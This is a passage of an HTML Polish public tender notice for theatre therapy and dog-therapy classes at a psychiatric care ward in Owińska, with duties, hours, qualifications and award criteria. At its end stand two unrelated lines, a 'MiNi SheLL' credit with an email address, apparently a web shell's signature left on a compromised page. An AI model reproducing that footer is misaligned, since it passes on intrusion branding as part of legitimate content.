9. ZOLiRM zapewnia sprzęt do wykonania zajęć typu; komputery, projektor, aparaty fotograficzne, kamery, sprzęt odtwarzający i nagrywający muzykę, sprzęt nagłaśniający, sprzęt muzyczny, oświetlenie, kurtyny, ekran, muzykę do odtwarzania na płytach CD zgodnie z przyjętymi w scenariuszach założeniami. Obowiązkiem Wykonawcy jest właściwe użytkowanie powierzonego do prowadzenia zajęć sprzętu. 
10. Nie przewiduje się żadnych dodatkowych opłat za wykonanie usługi. 

WYMAGANIA WOBEC WYKONAWCY (PROWADZĄCEGO ZAJĘCIA)
Bezwzględnie wymagane
1. Wykształcenie i kwalifikacje umożliwiające wykonywanie pracy terapeutycznej (łącznie)
a) wykształcenie wyższe, co najmniej na poziomie licencjatu 
b) studia podyplomowe z zakresu muzykoterapii
2. Co najmniej 1-roczne doświadczenie w pracy terapeutycznej (Zamawiający dopuszcza doświadczenie wynikające z realizacji umów o pracę, cywilnoprawnych, staży wolontariatu, praktyk itp.)
3. Dyspozycyjność w zakresie czasu pracy opisanego w punkcie Czas, miejsce, warunki świadczenia usług.
Wymagania dodatkowe poddawane ocenie 
1. Udokumentowane doświadczenie w pracy terapeutycznej z osobami niepełnosprawnymi intelektualnie i z zaburzeniami psychicznymi (Zamawiający dopuszcza doświadczenie wynikające z realizacji umów o pracę, cywilnoprawnych, staży wolontariatu, praktyk itp.) 
2. Ukończone (lub w trakcie realizacji) kursy i szkolenia tematycznie powiązane z terapią lub problemami osób, które są podmiotem działań terapeutycznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2016.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZAJĘCIA TERAPEUTYCZNE POPRZEZ TEATR.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> GŁÓWNE ZADANIA OSOBY PROWADZĄCEJ ZAJĘCIA
1.	Organizacja i prowadzenie grupowych (10 - 15 osób) zajęć terapeutycznych dla osób niesamodzielnych, niepełnosprawnych intelektualnie i z zaburzeniami psychicznymi zgodnie z załączonym szczegółowym programem działań (Załącznik nr 5 str. 101 - 144) 
2.	W ramach organizacji zajęć prowadzący zajęcia zobowiązany jest do zakupu wszystkich materiałów niezbędnych do ich prawidłowego poprowadzenia, wymienionych w załączonym Załączniku nr 8 Zestawienie ilości materiałów niezbędnych do realizacji programu działań terapeutycznych poprzez teatr w okresie grudzień 2014 - kwiecień 2016 oraz ich dostarczenia do miejsca odbywania zajęć. Zamawiający wymaga, aby wymienione materiały były zapewnione w takiej ilości i asortymencie, aby pozwalały każdemu z pacjentów aktywnie uczestniczyć w zajęciach. Jednocześnie Zamawiający zaznacza, że nie wymaga przy rozpoczynaniu każdego bloku zajęć dostarczenia zakupionego na nowo asortymentu. Jeżeli wcześniej zakupione materiały nie zostały zużyte i wciąż nadają się do dalszego użytkowania w toku dalszych zajęć nadal mogą być używane (np. kredki, farby itp.)
3.	Realizacja założonych celów zajęć
4.	Motywowanie uczestników do aktywnego udziału w zajęciach
5.	Odpowiedzialność za zapewnienie bezpieczeństwa pacjentów podczas prowadzenia zajęć.
6.	Współpraca z koordynatorem, asystentem koordynatora projektu ds. działań nieinwestycyjnych oraz  z pracownikami Oddziału w zakresie organizacji zajęć oraz we wszystkich innych obszarach związanych z realizacją działania.
7.	Prowadzenie dokumentacji indywidualnej pacjenta w powierzonym zakresie, w tym dokumentacji potwierdzającej uczestnictwo pacjenta w zajęciach . 
8.	Współpraca z osobami prowadzącymi nadzór autorski w zakresie prowadzonych działań ewaluacyjnych.
9.	Informowanie koordynatora projektu na bieżąco o wszystkich zaistniałych problemach w realizacji zajęć, terminowe przygotowywanie wszystkich wymaganych dokumentów, przestrzeganie obowiązków i zaleceń wynikających z realizacji umowy, procedur, standardów, instrukcji oraz innych obowiązujących dokumentów 
10.	Przechowywanie danych osobowych uczestników projektu z zachowaniem przepisów ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych i aktów wykonywanych do ww. ustawy. 

CZAS, MIEJSCE, WARUNKI ŚWIADCZENIA USŁUG 
1. Umowa z wykonawcą (prowadzącym zajęcia) zostanie zawarta na okres od jej podpisania do dnia 15.04.2016r.
2. Wykonawca będzie realizował powierzony zakres zajęć terapeutycznych w wyznaczonym dniu tygodnia (od poniedziałku do piątku) w godz. 9.00 - 13.00 i w tym okresie czasowym każdy z wykonawców musi pozostawać w dyspozycji dla Zamawiającego. 
Proponowany termin zajęć to czwartek. Dokładny dzień tygodnia, w którym będą prowadzone  zajęcia zostanie uzgodniony przed rozpoczęciem zajęć. 
3. Planowana ilość godzin pracy terapeutycznej dla prowadzącego zajęcia terapeutyczne poprzez tatr to: zajęcia grupowe 1 x w tygodniu x 4 godziny tj. średnio 16 godzin w miesiącu X 17 miesięcy = to średnio 272 godziny w czasie realizacji umowie.
4. Rozliczenie czasu pracy nastąpi na podstawie na podstawie kart czasu pracy. Wykonawca otrzyma wynagrodzenie za czas pracy podczas zajęć faktycznie zrealizowanych.
5. Czasu dojazdu do siedziby Zamawiającego oraz w inne miejsca związane z realizacją zadania nie wlicza się do rozliczenia godzin pracy..
6. Miejscem realizacji programu jest Oddział Opiekuńczo-Leczniczy Psychiatryczny w Owińskach, ul. Cysterek 5, który będzie też głównym miejscem  zajęć terapeutycznych realizowanych w ramach programu.
7. Do wykonania zamówienia Wykonawca powinien dysponować wszystkimi materiałami niezbędnymi do ich wykonania w ilości zapewniającej sprawną i zgodną ze szczegółowym programem działań realizację zajęć.
8. Przed rozpoczęciem zajęć nastąpi weryfikacja ilości i jakości dostarczonych przez Wykonawcę materiałów przeznaczonych do prawidłowego przeprowadzenia zajęć. W razie braku wystarczającej ilości materiałów Zamawiający wstrzyma prowadzenie zajęć do momenty zapewnienia pełnego uczestnictwa wszystkim pacjentom. Godzina rozpoczęcia zajęć liczona jest od momentu zaakceptowania przez Zamawiającego pełnej gotowości Wykonawcy do prowadzenia zajęć (w takich sytuacjach dopuszcza się możliwość zmniejszenia wynagrodzenia Wykonawcy do faktycznej ilości przepracowanych godzin lub wydłużenia czasu prowadzonych zajęć do pełnej liczby godzin konieczny do realizowania pełnego zakresu prowadzonych zajęć).
9. ZOLiRM zapewnia sprzęt do wykonania zajęć typu; komputery, projektor, aparaty fotograficzne, kamery, sprzęt odtwarzający i nagrywający muzykę, sprzęt nagłaśniający, sprzęt muzyczny, oświetlenie, kurtyny, ekran, muzykę do odtwarzania na płytach CD zgodnie z przyjętymi w scenariuszach założeniami. Obowiązkiem Wykonawcy jest właściwe użytkowanie powierzonego do prowadzenia zajęć sprzętu. 
10. Nie przewiduje się żadnych dodatkowych opłat za wykonanie usługi. 

WYMAGANIA WOBEC WYKONAWCY (PROWADZĄCEGO ZAJĘCIA)
Bezwzględnie wymagane
1. Wykształcenie i kwalifikacje umożliwiające wykonywanie pracy terapeutycznej - co najmniej 1 element spośród niżej wymienionych:
a) Wykształcenie zawodowe terapeuty zajęciowego,
b) Wykształcenie wyższe co najmniej na poziomie licencjatu,
c) udokumentowanie doświadczenie w wykorzystywaniu technik teatralnych i dramaturgicznych w pracy terapeutycznej.
2. Co najmniej 1-roczne doświadczenie w pracy terapeutyczno-edukacyjnej (Zamawiający dopuszcza doświadczenie wynikające z realizacji umów o pracę, cywilnoprawnych, staży, wolontariatu, praktyk itp.)
3. Dyspozycyjność w zakresie czasu pracy opisanego w punkcie Czas, miejsce, warunki świadczenia usług.
Wymagania dodatkowe poddawane ocenie 
1. Udokumentowane doświadczenie w pracy terapeutycznno-edukacyjnej z osobami niepełnosprawnymi intelektualnie i z zaburzeniami psychicznymi (Zamawiający dopuszcza doświadczenie wynikające z realizacji umów o pracę, cywilnoprawnych, staży wolontariatu, praktyk itp.) 
2. Ukończone (lub w trakcie realizacji) kursy i szkolenia tematycznie powiązane z terapią lub problemami osób, które są podmiotem działań terapeutycznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Kompetencje zawodowe - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ZAJĘCIA TERAPEUTYCZNE Z DOGOTERAPII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> GŁÓWNE ZADANIA OSOBY PROWADZĄCEJ ZAJĘCIA
1.	Organizacja i prowadzenie grupowych (6 - 8 osób) i indywidualnych (4 - 5 osób) zajęć terapeutycznych dla osób niepełnosprawnych umysłowo i z zaburzeniami psychicznymi zgodnie z załączonym szczegółowym programem działań (Załącznik nr 5 str. 145 - 158).
2.	W ramach organizacji zajęć prowadzący zajęcia zobowiązany jest do:
a) zapewnienia certyfikowanego psa terapeutycznego do wszystkich prowadzonych zajęć. 
b)zapewnienia 2-giej osoby wspomagającej proces terapeutyczny do każdych zajęć indywidualnych 
c) zapewnienie wszystkich materiałów niezbędnych do prawidłowego poprowadzenia zajęć, wymienionych w załączonym Załączniku nr 9 Zestawienie ilości materiałów niezbędnych do realizacji programu działań terapeutycznych z Dogoterapii w okresie grudzień 2014 - kwiecień 2016 oraz ich dostarczenia do miejsca odbywania zajęć. 
Zamawiający wymaga, aby wymienione materiały były zapewnione w takiej ilości i asortymencie, aby pozwalały każdemu z pacjentów aktywnie uczestniczyć w zajęciach. Jednocześnie Zamawiający zaznacza, że nie wymaga przy rozpoczynaniu każdego bloku zajęć dostarczenia zakupionego na nowo asortymentu. Jeżeli wcześniej zakupione materiały nie zostały zużyte i wciąż nadają się do dalszego użytkowania w toku dalszych zajęć nadal mogą być używane (np. kredki, farby itp.)	
3. Realizacja założonych celów zajęć
4. Motywowanie uczestników do aktywnego udziału w zajęciach
5. Odpowiedzialność za zapewnienie bezpieczeństwa pacjentów podczas prowadzenia zajęć.
6. Współpraca z koordynatorem, asystentem koordynatora projektu ds. działań nieinwestycyjnych oraz z pracownikami Oddziału w zakresie organizacji zajęć oraz we wszystkich innych obszarach związanych z realizacją działania.
7. Prowadzenie dokumentacji indywidualnej pacjenta w powierzonym zakresie w, w tym dokumentacji potwierdzającej uczestnictwo pacjenta w zajęciach .
8. Współpraca z osobami prowadzącymi nadzór autorski w zakresie prowadzonych działań ewaluacyjnych.
9. Informowanie koordynatora projektu na bieżąco o wszystkich zaistniałych problemach w realizacji zajęć, terminowe przygotowywanie wszystkich wymaganych dokumentów, przestrzeganie obowiązków i zaleceń wynikających z realizacji umowy, procedur, standardów, instrukcji oraz innych obowiązujących dokumentów 
10. Przechowywanie danych osobowych uczestników projektu z zachowaniem przepisów ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych i aktów wykonywanych do ww. ustawy. 
11. Dodatkowe wymagania dotyczące psa terapeutycznego: aktualna legitymacja/certyfikat/zaświadczenie ze zdjęciem potwierdzające stopień wyszkolenia psa terapeutycznego oraz aktualne zaświadczenie od lekarza weterynarii o aktualnym stanie zdrowia psa terapeutycznego i odbyciu przez niego wszystkich szczepień ochronnych i odrobaczania - obowiązek dostarczenia przed rozpoczęciem zajęć a następnie co 3 miesiące (ww. dokumenty należy dostarczyć przed dniem zawarcia umowy)

CZAS, MIEJSCE, WARUNKI ŚWIADCZENIA USŁUG 
1. Umowa z Wykonawcą (prowadzącym zajęcia) zostanie zawarta na okres od jej podpisania do dnia 15.04.2016r.
2. Wykonawca będzie realizował powierzony zakres zajęć terapeutycznych w 2 wyznaczonych dniach tygodnia po 2 godz. na jedne zajęcia (od poniedziałku do piątku) w godz. 9.00 - 13.00 i w tym okresie czasowym każdy z Wykonawców musi pozostawać w dyspozycji dla Zamawiającego. 
Proponowany termin zajęć to poniedziałek i piątek. Dokładny dzień tygodnia i czas prowadzenia zajęć zostanie uzgodniony przed rozpoczęciem zajęć. 
3. Planowana ilość godzin pracy terapeutycznej dla prowadzącego zajęcia terapeutyczne z dogoterapii to:
a) zajęcia grupowe 1 x w tygodniu x 2 godziny tj. średnio 16 godzin w miesiącu X 17 miesięcy =136 godziny w czasie realizacji umowy.
b) zajęcia indywidualne 1 x w tygodniu x 2 godziny tj. średnio 16 godzin w miesiącu X 17 miesięcy = 136 godziny w czasie realizacji umowy.
Zamawiający dopuszcza przesunięcia godzinowe pomiędzy rodzajami zajęć grupowymi i indywidualnymi, które wynikają z rodzących się potrzeb w toku prowadzenia zajęć.
4. Rozliczenie czasu pracy nastąpi na podstawie na podstawie kart czasu pracy. Wykonawca otrzyma wynagrodzenie za czas pracy podczas zajęć faktycznie zrealizowanych.
5. Czasu dojazdu do siedziby Zamawiającego oraz w inne miejsca związane z realizacją zadania nie wlicza się do rozliczenia godzin pracy. 
6. Miejscem realizacji programu jest Oddział Opiekuńczo-Leczniczy Psychiatryczny w Owińskach, ul. Cysterek 5, który będzie też głównym miejscem  zajęć terapeutycznych realizowanych w ramach programu.
7. Do wykonania zamówienia Wykonawca powinien dysponować wszystkimi materiałami niezbędnymi do ich wykonania w ilości zapewniającej sprawną i zgodną ze scenariuszem realizację zajęć.
8. Przed rozpoczęciem zajęć nastąpi weryfikacja ilości i jakości dostarczonych przez Wykonawcę materiałów przeznaczonych do prawidłowego przeprowadzenia zajęć. W razie braku wystarczającej ilości materiałów Zamawiający wstrzyma prowadzenie zajęć do momenty zapewnienia pełnego uczestnictwa wszystkim pacjentom. Godzina rozpoczęcia zajęć liczona jest od momentu zaakceptowania przez Zamawiającego pełnej gotowości Wykonawcy do prowadzenia zajęć (w takich sytuacjach dopuszcza się możliwość zmniejszenia wynagrodzenia Wykonawcy do faktycznej ilości przepracowanych godzin lub wydłużenia czasu prowadzonych zajęć do pełnej liczby godzin konieczny do realizowania pełnego zakresu prowadzonych zajęć). 
9. ZOLiRM zapewnia sprzęt do wykonania zajęć typu; komputery, projektor, aparaty fotograficzne, kamery, sprzęt odtwarzający i nagrywający muzykę, sprzęt nagłaśniający, sprzęt muzyczny, oświetlenie, kurtyny, ekran, muzykę do odtwarzania na płytach CD zgodnie z przyjętymi w scenariuszach założeniami. Obowiązkiem Wykonawcy jest właściwe użytkowanie powierzonego do prowadzenia zajęć sprzętu. 
10. Nie przewiduje się żadnych dodatkowych opłat za wykonanie usługi. 

WYMAGANIA WOBEC WYKONAWCY (PROWADZĄCEGO ZAJĘCIA)
Bezwzględnie wymagane
1. Wykształcenie i kwalifikacje umożliwiające wykonywanie pracy terapeutycznej - co najmniej 2 elementy spośród niżej wymienionych:
a) Wykształcenie zawodowe terapeuty zajęciowego
b) Wykształcenie wyższe, co najmniej na poziomie licencjatu
c) kurs zawodowy lub dokształcający z zakresu dogoterapii lub kynoterapii obejmujący min 180 godzin edukacyjnych
2. Co najmniej 1-roczne doświadczenie w pracy terapeutycznej (Zamawiający dopuszcza doświadczenie wynikające z realizacji umów o pracę, cywilnoprawnych, staży wolontariatu, praktyk itp.)
3. Dyspozycyjność w zakresie czasu pracy opisanego w punkcie Czas, miejsce, warunki świadczenia usług.

Wymagania dodatkowe poddawane ocenie 
1. Udokumentowane doświadczenie w pracy terapeutycznej z osobami niepełnosprawnymi intelektualnie i z zaburzeniami psychicznymi (Zamawiający dopuszcza doświadczenie wynikające z realizacji umów o pracę, cywilnoprawnych, staży wolontariatu, praktyk itp.) 
2. Ukończone (lub w trakcie realizacji) kursy i szkolenia tematycznie powiązane z terapią lub problemami osób, które są podmiotem działań terapeutycznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2016.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com